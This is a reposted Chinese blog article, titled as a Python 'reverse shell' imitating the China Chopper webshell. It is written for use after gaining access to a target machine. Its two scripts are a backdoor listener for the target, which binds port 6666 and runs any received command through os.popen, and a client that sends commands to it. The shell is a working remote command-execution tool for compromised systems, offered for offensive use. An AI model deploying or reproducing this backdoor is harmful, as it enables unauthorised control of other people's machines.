gpt4 book ai didi

python模拟菜刀反弹shell绕过限制【推荐】

转载 作者:qq735679552 更新时间:2022-09-28 22:32:09 31 4
gpt4 key购买 nike

CFSDN坚持开源创造价值,我们致力于搭建一个资源共享平台,让每一个IT人在这里找到属于你的精彩世界.

这篇CFSDN的博客文章python模拟菜刀反弹shell绕过限制【推荐】由作者收集整理,如果你对这篇文章有兴趣,记得点赞哟.

有的时候我们在获取到目标电脑时候如果对方电脑又python 编译环境时可以利用python 反弹shell 。

主要用到python os库和sokect库 。

这里的服务端在目标机上运行 。

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from socket import *
from os import *
s = socket(AF_INET,SOCK_STREAM) #IVP4 寻址 tcp协议
s.bind(('', 6666 )) #补丁端口
s.listen( 1 ) #开始监听一个队列
while True :
   sock,addr = s.accept() #返回两次 第一次返回连接地址 二 端口号
   print ( '客户端:' ,addr)
   while True :
     cmd = sock.recv( 1024 ) #缓存长度 接收传递过来
     cmdstr = cmd.decode()
     if cmdstr = = 'exit' :
       print ( '客户端:' ,addr, '关闭' )
       sock.close()
       break
     result = popen(cmdstr).read()
     sock.send(result.encode())
s.close()

本机运行 。

?
1
2
3
4
5
6
7
8
9
10
11
12
13
from socket import *
from os import *
 
c = socket(AF_INET,SOCK_STREAM) #IVP4 寻址 tcp协议
c.connect(( '127.0.0.1' , 6666 )) #连接地址
while True :
   cmd = input ( "cmd:" )
   c.send(cmd.encode()) #必须传递流
   if cmd = = 'exit' :
     c.close()
     break
   data = c.recv( 1014 )
   print (data.decode())

总结 。

以上所述是小编给大家介绍的python模拟菜刀反弹shell绕过限制,希望对大家有所帮助,如果大家有任何疑问欢迎给我留言,小编会及时回复大家的! 。

原文链接:https://www.cnblogs.com/yuanzijian-ruiec/archive/2019/06/25/11081385.html 。

最后此篇关于python模拟菜刀反弹shell绕过限制【推荐】的文章就讲到这里了,如果你想了解更多关于python模拟菜刀反弹shell绕过限制【推荐】的内容请搜索CFSDN的文章或继续浏览相关文章,希望大家以后支持我的博客! 。

31 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com